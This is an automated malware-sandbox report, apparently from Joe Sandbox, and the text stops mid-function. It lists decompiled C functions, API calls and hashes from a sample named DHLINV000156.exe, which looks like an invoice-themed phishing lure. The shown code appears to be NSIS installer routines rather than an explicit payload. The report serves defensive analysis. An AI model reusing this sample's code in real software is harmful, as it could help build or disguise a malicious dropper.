                                        • Instruction Fuzzy Hash: F9C04C71754201BAEA319B50DD49F0777586750B00F5584257314F60D1C6B4E451D62D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004031ED(long _a4) {
                                        				long _t2;
                                        
                                        				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
                                        				return _t2;
                                        			}




                                        0x004031fb
                                        0x00403201

                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,?), ref: 004031FB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                        • Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
                                        • Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                        • Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040409D(int _a4) {
                                        				long _t2;
                                        
                                        				_t2 = SendMessageA( *0x423708, 0x28, _a4, 1); // executed
                                        				return _t2;
                                        			}




                                        0x004040ab
                                        0x004040b1

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                        • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                        • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                        • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040408A(int _a4) {
                                        				int _t2;
                                        
                                        				_t2 = EnableWindow( *0x41fd04, _a4); // executed
                                        				return _t2;
                                        			}




                                        0x00404094
                                        0x0040409a

                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00403E66), ref: 00404094
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                        • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                        • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                        • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004014D6(intOrPtr __edx) {
                                        				long _t3;
                                        				void* _t7;
                                        				intOrPtr _t10;
                                        				void* _t13;
                                        
                                        				_t10 = __edx;
                                        				_t3 = E00402B0A(_t7);
                                        				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                        				if(_t3 <= 1) {
                                        					_t3 = 1;
                                        				}
                                        				Sleep(_t3); // executed
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t13 - 4));
                                        				return 0;
                                        			}







                                        0x004014d6
                                        0x004014d7
                                        0x004014e0
                                        0x004014e3
                                        0x004014e7
                                        0x004014e7
                                        0x004014e9
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: d9f52a12c88ee283977d5920e0d6ef8e8d30f27bfac36a8745942db4e2d1bc55
                                        • Instruction ID: 7b2de1959f7787123af4a7ca0670908521d01be6578697f59b2e727061aca9c4
                                        • Opcode Fuzzy Hash: d9f52a12c88ee283977d5920e0d6ef8e8d30f27bfac36a8745942db4e2d1bc55
                                        • Instruction Fuzzy Hash: CAD05EB3B142019BDB10DFB8AE8445F73F8E7503157604837D502F2191E2B8D9028668
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E73EF1215() {
                                        				void* _t1;
                                        
                                        				_t1 = GlobalAlloc(0x40,  *0x73ef405c); // executed
                                        				return _t1;
                                        			}




                                        0x73ef121d
                                        0x73ef1223

                                        APIs
                                        • GlobalAlloc.KERNELBASE(00000040,73EF1233,?,73EF12CF,-73EF404B,73EF11AB,-000000A0), ref: 73EF121D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.789361572.0000000073EF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 73EF0000, based on PE: true
                                        • Associated: 00000000.00000002.789352592.0000000073EF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789369353.0000000073EF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789378752.0000000073EF5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73ef0000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: AllocGlobal
                                        • String ID:
                                        • API String ID: 3761449716-0
                                        • Opcode ID: 239ee1c8feaf64a64d6667e6a50c36d13620a29798548c779ad92a5ae3fbf51c
                                        • Instruction ID: dbb02d370cb8ddcedd0376585e105450e3a8e768dd369363fbf8383731077e24
                                        • Opcode Fuzzy Hash: 239ee1c8feaf64a64d6667e6a50c36d13620a29798548c779ad92a5ae3fbf51c
                                        • Instruction Fuzzy Hash: FFA0027B944132FBDED1BBE2890AF143B29E7C8701F208041E35D54194C6F68010DF36
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E004044FA(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				long _v16;
                                        				long _v20;
                                        				long _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				long _v36;
                                        				char _v40;
                                        				unsigned int _v44;
                                        				signed int _v48;
                                        				CHAR* _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				CHAR* _v72;
                                        				void _v76;
                                        				struct HWND__* _v80;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t82;
                                        				long _t87;
                                        				signed char* _t89;
                                        				void* _t95;
                                        				signed int _t96;
                                        				int _t109;
                                        				signed char _t114;
                                        				signed int _t118;
                                        				struct HWND__** _t122;
                                        				intOrPtr* _t138;
                                        				CHAR* _t146;
                                        				intOrPtr _t147;
                                        				unsigned int _t150;
                                        				signed int _t152;
                                        				unsigned int _t156;
                                        				signed int _t158;
                                        				signed int* _t159;
                                        				signed char* _t160;
                                        				struct HWND__* _t165;
                                        				struct HWND__* _t166;
                                        				int _t168;
                                        				unsigned int _t197;
                                        				void* _t205;
                                        
                                        				_t156 = __edx;
                                        				_t82 =  *0x41f4e0; // 0x4ea08c
                                        				_v32 = _t82;
                                        				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x424000;
                                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                        				if(_a8 == 0x40b) {
                                        					E004056DA(0x3fb, _t146);
                                        					E00406244(_t146);
                                        				}
                                        				_t166 = _a4;
                                        				if(_a8 != 0x110) {
                                        					L8:
                                        					if(_a8 != 0x111) {
                                        						L20:
                                        						if(_a8 == 0x40f) {
                                        							L22:
                                        							_v8 = _v8 & 0x00000000;
                                        							_v12 = _v12 & 0x00000000;
                                        							E004056DA(0x3fb, _t146);
                                        							if(E00405A60(_t185, _t146) == 0) {
                                        								_v8 = 1;
                                        							}
                                        							E00405FDA(0x41ecd8, _t146);
                                        							_t87 = E00406372(1);
                                        							_v16 = _t87;
                                        							if(_t87 == 0) {
                                        								L30:
                                        								E00405FDA(0x41ecd8, _t146);
                                        								_t89 = E00405A0B(0x41ecd8);
                                        								_t158 = 0;
                                        								if(_t89 != 0) {
                                        									 *_t89 =  *_t89 & 0x00000000;
                                        								}
                                        								if(GetDiskFreeSpaceA(0x41ecd8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                        									goto L35;
                                        								} else {
                                        									_t168 = 0x400;
                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                        									asm("cdq");
                                        									_v48 = _t109;
                                        									_v44 = _t156;
                                        									_v12 = 1;
                                        									goto L36;
                                        								}
                                        							} else {
                                        								_t159 = 0;
                                        								if(0 == 0x41ecd8) {
                                        									goto L30;
                                        								} else {
                                        									goto L26;
                                        								}
                                        								while(1) {
                                        									L26:
                                        									_t114 = _v16(0x41ecd8,  &_v48,  &_v28,  &_v40);
                                        									if(_t114 != 0) {
                                        										break;
                                        									}
                                        									if(_t159 != 0) {
                                        										 *_t159 =  *_t159 & _t114;
                                        									}
                                        									_t160 = E004059B9(0x41ecd8);
                                        									 *_t160 =  *_t160 & 0x00000000;
                                        									_t159 = _t160 - 1;
                                        									 *_t159 = 0x5c;
                                        									if(_t159 != 0x41ecd8) {
                                        										continue;
                                        									} else {
                                        										goto L30;
                                        									}
                                        								}
                                        								_t150 = _v44;
                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                        								_v44 = _t150 >> 0xa;
                                        								_v12 = 1;
                                        								_t158 = 0;
                                        								__eflags = 0;
                                        								L35:
                                        								_t168 = 0x400;
                                        								L36:
                                        								_t95 = E0040498E(5);
                                        								if(_v12 != _t158) {
                                        									_t197 = _v44;
                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                        										_v8 = 2;
                                        									}
                                        								}
                                        								_t147 =  *0x422edc; // 0x4ebb51
                                        								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                        									E00404976(0x3ff, 0xfffffffb, _t95);
                                        									if(_v12 == _t158) {
                                        										SetDlgItemTextA(_a4, _t168, 0x41ecc8);
                                        									} else {
                                        										E004048B1(_t168, 0xfffffffc, _v48, _v44);
                                        									}
                                        								}
                                        								_t96 = _v8;
                                        								 *0x4237c4 = _t96;
                                        								if(_t96 == _t158) {
                                        									_v8 = E0040140B(7);
                                        								}
                                        								if(( *(_v32 + 0x14) & _t168) != 0) {
                                        									_v8 = _t158;
                                        								}
                                        								E0040408A(0 | _v8 == _t158);
                                        								if(_v8 == _t158) {
                                        									_t205 =  *0x41fcf8 - _t158; // 0x0
                                        									if(_t205 == 0) {
                                        										E00404453();
                                        									}
                                        								}
                                        								 *0x41fcf8 = _t158;
                                        								goto L53;
                                        							}
                                        						}
                                        						_t185 = _a8 - 0x405;
                                        						if(_a8 != 0x405) {
                                        							goto L53;
                                        						}
                                        						goto L22;
                                        					}
                                        					_t118 = _a12 & 0x0000ffff;
                                        					if(_t118 != 0x3fb) {
                                        						L12:
                                        						if(_t118 == 0x3e9) {
                                        							_t152 = 7;
                                        							memset( &_v76, 0, _t152 << 2);
                                        							_v80 = _t166;
                                        							_v72 = 0x41fd08;
                                        							_v60 = E0040484B;
                                        							_v56 = _t146;
                                        							_v68 = E00405FFC(_t146, 0x41fd08, _t166, 0x41f0e0, _v12);
                                        							_t122 =  &_v80;
                                        							_v64 = 0x41;
                                        							__imp__SHBrowseForFolderA(_t122);
                                        							if(_t122 == 0) {
                                        								_a8 = 0x40f;
                                        							} else {
                                        								__imp__CoTaskMemFree(_t122);
                                        								E00405972(_t146);
                                        								_t125 =  *((intOrPtr*)( *0x423714 + 0x11c));
                                        								if( *((intOrPtr*)( *0x423714 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto") {
                                        									E00405FFC(_t146, 0x41fd08, _t166, 0, _t125);
                                        									if(lstrcmpiA(0x4226a0, 0x41fd08) != 0) {
                                        										lstrcatA(_t146, 0x4226a0);
                                        									}
                                        								}
                                        								 *0x41fcf8 =  *0x41fcf8 + 1;
                                        								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                        							}
                                        						}
                                        						goto L20;
                                        					}
                                        					if(_a12 >> 0x10 != 0x300) {
                                        						goto L53;
                                        					} else {
                                        						_a8 = 0x40f;
                                        						goto L12;
                                        					}
                                        				} else {
                                        					_t165 = GetDlgItem(_t166, 0x3fb);
                                        					if(E004059DF(_t146) != 0 && E00405A0B(_t146) == 0) {
                                        						E00405972(_t146);
                                        					}
                                        					 *0x422ed8 = _t166;
                                        					SetWindowTextA(_t165, _t146);
                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                        					_push(1);
                                        					E00404068(_t166);
                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                        					_push(0x14);
                                        					E00404068(_t166);
                                        					E0040409D(_t165);
                                        					_t138 = E00406372(7);
                                        					if(_t138 == 0) {
                                        						L53:
                                        						return E004040CF(_a8, _a12, _a16);
                                        					} else {
                                        						 *_t138(_t165, 1);
                                        						goto L8;
                                        					}
                                        				}
                                        			}















































                                        0x004044fa
                                        0x00404500
                                        0x00404506
                                        0x00404513
                                        0x00404521
                                        0x00404524
                                        0x0040452c
                                        0x00404532
                                        0x00404532
                                        0x0040453e
                                        0x00404541
                                        0x004045af
                                        0x004045b6
                                        0x0040468d
                                        0x00404694
                                        0x004046a3
                                        0x004046a3
                                        0x004046a7
                                        0x004046b1
                                        0x004046be
                                        0x004046c0
                                        0x004046c0
                                        0x004046ce
                                        0x004046d5
                                        0x004046dc
                                        0x004046df
                                        0x00404716
                                        0x00404718
                                        0x0040471e
                                        0x00404723
                                        0x00404727
                                        0x00404729
                                        0x00404729
                                        0x00404745
                                        0x00000000
                                        0x00404747
                                        0x0040474a
                                        0x00404758
                                        0x0040475e
                                        0x0040475f
                                        0x00404762
                                        0x00404765
                                        0x00000000
                                        0x00404765
                                        0x004046e1
                                        0x004046e3
                                        0x004046e7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004046e9
                                        0x004046e9
                                        0x004046f6
                                        0x004046fb
                                        0x00000000
                                        0x00000000
                                        0x004046ff
                                        0x00404701
                                        0x00404701
                                        0x00404709
                                        0x0040470b
                                        0x0040470e
                                        0x00404711
                                        0x00404714
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404714
                                        0x00404771
                                        0x0040477b
                                        0x0040477e
                                        0x00404781
                                        0x00404788
                                        0x00404788
                                        0x0040478a
                                        0x0040478a
                                        0x0040478f
                                        0x00404791
                                        0x00404799
                                        0x004047a0
                                        0x004047a2
                                        0x004047ad
                                        0x004047ad
                                        0x004047a2
                                        0x004047b4
                                        0x004047bd
                                        0x004047c7
                                        0x004047cf
                                        0x004047ea
                                        0x004047d1
                                        0x004047da
                                        0x004047da
                                        0x004047cf
                                        0x004047ef
                                        0x004047f4
                                        0x004047f9
                                        0x00404802
                                        0x00404802
                                        0x0040480b
                                        0x0040480d
                                        0x0040480d
                                        0x00404819
                                        0x00404821
                                        0x00404823
                                        0x00404829
                                        0x0040482b
                                        0x0040482b
                                        0x00404829
                                        0x00404830
                                        0x00000000
                                        0x00404830
                                        0x004046df
                                        0x00404696
                                        0x0040469d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040469d
                                        0x004045bc
                                        0x004045c5
                                        0x004045df
                                        0x004045e4
                                        0x004045ee
                                        0x004045f5
                                        0x00404601
                                        0x00404604
                                        0x00404607
                                        0x0040460e
                                        0x00404616
                                        0x00404619
                                        0x0040461d
                                        0x00404624
                                        0x0040462c
                                        0x00404686
                                        0x0040462e
                                        0x0040462f
                                        0x00404636
                                        0x00404640
                                        0x00404648
                                        0x00404655
                                        0x00404669
                                        0x0040466d
                                        0x0040466d
                                        0x00404669
                                        0x00404672
                                        0x0040467f
                                        0x0040467f
                                        0x0040462c
                                        0x00000000
                                        0x004045e4
                                        0x004045d2
                                        0x00000000
                                        0x004045d8
                                        0x004045d8
                                        0x00000000
                                        0x004045d8
                                        0x00404543
                                        0x00404550
                                        0x00404559
                                        0x00404566
                                        0x00404566
                                        0x0040456d
                                        0x00404573
                                        0x0040457c
                                        0x0040457f
                                        0x00404582
                                        0x0040458a
                                        0x0040458d
                                        0x00404590
                                        0x00404596
                                        0x0040459d
                                        0x004045a4
                                        0x00404836
                                        0x00404848
                                        0x004045aa
                                        0x004045ad
                                        0x00000000
                                        0x004045ad
                                        0x004045a4

                                        APIs
                                        • GetDlgItem.USER32 ref: 00404549
                                        • SetWindowTextA.USER32(00000000,?), ref: 00404573
                                        • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404624
                                        • CoTaskMemFree.OLE32(00000000), ref: 0040462F
                                        • lstrcmpiA.KERNEL32(Call,Sepad149: Installing,00000000,?,?), ref: 00404661
                                        • lstrcatA.KERNEL32(?,Call), ref: 0040466D
                                        • SetDlgItemTextA.USER32 ref: 0040467F
                                          • Part of subcall function 004056DA: GetDlgItemTextA.USER32 ref: 004056ED
                                          • Part of subcall function 00406244: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DHLINV000156.exe",74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040629C
                                          • Part of subcall function 00406244: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062A9
                                          • Part of subcall function 00406244: CharNextA.USER32(?,"C:\Users\user\Desktop\DHLINV000156.exe",74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062AE
                                          • Part of subcall function 00406244: CharPrevA.USER32(?,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062BE
                                        • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040473D
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404758
                                          • Part of subcall function 004048B1: lstrlenA.KERNEL32(Sepad149: Installing,Sepad149: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                          • Part of subcall function 004048B1: wsprintfA.USER32 ref: 00404957
                                          • Part of subcall function 004048B1: SetDlgItemTextA.USER32 ref: 0040496A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto$Call$Sepad149: Installing
                                        • API String ID: 2624150263-3862404528
                                        • Opcode ID: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                        • Instruction ID: a574bab901635a86c0a25b0ea1efcbf713871747dcedb108b051a9d89a4042ab
                                        • Opcode Fuzzy Hash: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                        • Instruction Fuzzy Hash: E9A16FB1900219ABDB11EFA5CD41AAFB7B8EF85315F10843BF601B62D1D77C8A418F69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E73EF1A98() {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				CHAR* _v24;
                                        				CHAR* _v28;
                                        				signed int _v32;
                                        				signed int _v36;
                                        				signed int _v40;
                                        				signed int _v44;
                                        				CHAR* _v48;
                                        				signed int _v52;
                                        				void* _v56;
                                        				intOrPtr _v60;
                                        				CHAR* _t207;
                                        				signed int _t210;
                                        				void* _t212;
                                        				void* _t214;
                                        				CHAR* _t216;
                                        				void* _t224;
                                        				struct HINSTANCE__* _t225;
                                        				struct HINSTANCE__* _t226;
                                        				struct HINSTANCE__* _t228;
                                        				signed short _t230;
                                        				struct HINSTANCE__* _t233;
                                        				struct HINSTANCE__* _t235;
                                        				void* _t236;
                                        				char* _t237;
                                        				void* _t248;
                                        				signed char _t249;
                                        				signed int _t250;
                                        				struct HINSTANCE__* _t256;
                                        				void* _t257;
                                        				signed int _t259;
                                        				intOrPtr _t260;
                                        				char* _t263;
                                        				signed int _t268;
                                        				signed int _t271;
                                        				signed int _t273;
                                        				void* _t276;
                                        				void* _t280;
                                        				struct HINSTANCE__* _t282;
                                        				intOrPtr _t285;
                                        				void _t286;
                                        				signed int _t287;
                                        				signed int _t299;
                                        				signed int _t300;
                                        				intOrPtr _t303;
                                        				void* _t304;
                                        				signed int _t308;
                                        				signed int _t311;
                                        				signed int _t314;
                                        				signed int _t315;
                                        				signed int _t316;
                                        				intOrPtr _t319;
                                        				intOrPtr* _t320;
                                        				CHAR* _t321;
                                        				CHAR* _t323;
                                        				CHAR* _t324;
                                        				struct HINSTANCE__* _t325;
                                        				void* _t327;
                                        				signed int _t328;
                                        				void* _t329;
                                        
                                        				_t282 = 0;
                                        				_v32 = 0;
                                        				_v36 = 0;
                                        				_v16 = 0;
                                        				_v8 = 0;
                                        				_v40 = 0;
                                        				_t329 = 0;
                                        				_v52 = 0;
                                        				_v44 = 0;
                                        				_t207 = E73EF1215();
                                        				_v24 = _t207;
                                        				_v28 = _t207;
                                        				_v48 = E73EF1215();
                                        				_t320 = E73EF123B();
                                        				_v56 = _t320;
                                        				_v12 = _t320;
                                        				while(1) {
                                        					_t210 = _v32;
                                        					_v60 = _t210;
                                        					if(_t210 != _t282 && _t329 == _t282) {
                                        						break;
                                        					}
                                        					_t319 =  *_t320;
                                        					_t285 = _t319;
                                        					_t212 = _t285 - _t282;
                                        					if(_t212 == 0) {
                                        						_t37 =  &_v32;
                                        						 *_t37 = _v32 | 0xffffffff;
                                        						__eflags =  *_t37;
                                        						L20:
                                        						_t214 = _v60 - _t282;
                                        						if(_t214 == 0) {
                                        							 *_v28 =  *_v28 & 0x00000000;
                                        							__eflags = _t329 - _t282;
                                        							if(_t329 == _t282) {
                                        								_t329 = GlobalAlloc(0x40, 0x14a4);
                                        								 *(_t329 + 0x810) = _t282;
                                        								 *(_t329 + 0x814) = _t282;
                                        							}
                                        							_t286 = _v36;
                                        							_t47 = _t329 + 8; // 0x8
                                        							_t216 = _t47;
                                        							_t48 = _t329 + 0x408; // 0x408
                                        							_t321 = _t48;
                                        							 *_t329 = _t286;
                                        							 *_t216 =  *_t216 & 0x00000000;
                                        							 *(_t329 + 0x808) = _t282;
                                        							 *_t321 =  *_t321 & 0x00000000;
                                        							_t287 = _t286 - _t282;
                                        							__eflags = _t287;
                                        							 *(_t329 + 0x80c) = _t282;
                                        							 *(_t329 + 4) = _t282;
